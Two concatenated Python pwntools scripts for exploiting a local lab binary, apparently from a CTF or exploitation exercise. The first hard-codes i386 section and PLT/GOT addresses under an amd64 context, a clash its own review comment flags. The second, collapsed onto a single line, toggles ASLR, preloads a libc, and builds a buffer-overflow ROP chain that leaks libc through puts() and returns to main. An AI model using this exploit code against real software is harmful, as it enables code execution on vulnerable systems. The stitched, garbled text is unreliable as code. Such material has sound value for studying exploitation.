#!/usr/bin/env python3
"""Spawn the ./lab binary and log the hard-coded section and PLT/GOT addresses
that the script works with."""
from pwn import process, ELF, log, context, pause
from fastpwn import pack

# pwntools context for the target plus verbose tube logging
context(arch='amd64', os='linux', log_level='DEBUG')

binary = ELF('./lab')
p = binary.process()

offset = 112

# Section addresses are hard-coded: per the original author's note the binary
# is not PIE, so they are fixed at load time. They are kept as plain ints
# (not packed to bytes) because they are used as numeric offsets.
# NOTE(review): these values are in the i386 0x0804xxxx range while
# context.arch is set to 'amd64' -- confirm the intended target architecture.
bss = 0x0804c028
plt = 0x08049030
rel_plt = 0x08048424
dynsym = 0x08048260
dynstr = 0x08048320

# PLT/GOT entries for read()
got_read = 0x0804c010
plt_read = 0x08049050

# Wait for the operator before going any further.
log.info("")
log.warning("continue?")
log.info("")
pause()

# Echo every address relied on, one per line; format strings kept verbatim.
_address_report = (
    (".bss: \t%s", bss),
    (".plt: \t%s", plt),
    (".rel.plt: %s", rel_plt),
    (".dynsym: %s", dynsym),
    (".dynstr: %s", dynstr),
    ("GOT entry to read: %s", got_read),
    ("PLT entry to read: %s", plt_read),
)
for fmt, addr in _address_report:
    log.info(fmt % hex(addr))

stack = 0x300
#!/usr/bin/env python3 from pwn import ELF, process, context, log from fastpwn import pack, aslr # custom library :) from sys import argv, exit try: if len(argv) > 1 and argv[1] == "-l": if aslr.read(): aslr.write("2") context(arch='amd64', os='linux', log_level='DEBUG') # binary context binary = ELF("./lab") # define our binary p = binary.process(env={'LD_PRELOAD': './libc.so.6' }) # start our process and define enviroment libc = binary.libc # name our libc object # we can statically find the addresses of the PLT and GOT within the binary # just in case you were too lazy to, here is the pwntools way to do it # # plt_puts=binary.plt['puts'] # got_puts=binary.got['puts'] # main_addr=binary.sym['main'] pop_rdi = pack.pk64(0x00000000004011e3) got_puts = pack.pk64(0x00404018) plt_puts = pack.pk64(0x00401030) main_addr = pack.pk64(0x00401136) offset = 40 leak_payload = b"A" * offset # overwrite ret addr, main ret back to gadget leak_payload += pop_rdi # next we use a gadget, rdi will be the first parameter leak_payload += got_puts # pass the address of the puts() entry on the global offset table leak_payload += plt_puts # then, call puts(), this will actuall call puts leak_payload += main_addr # ret back to main, since we still want to overwrite the buffer again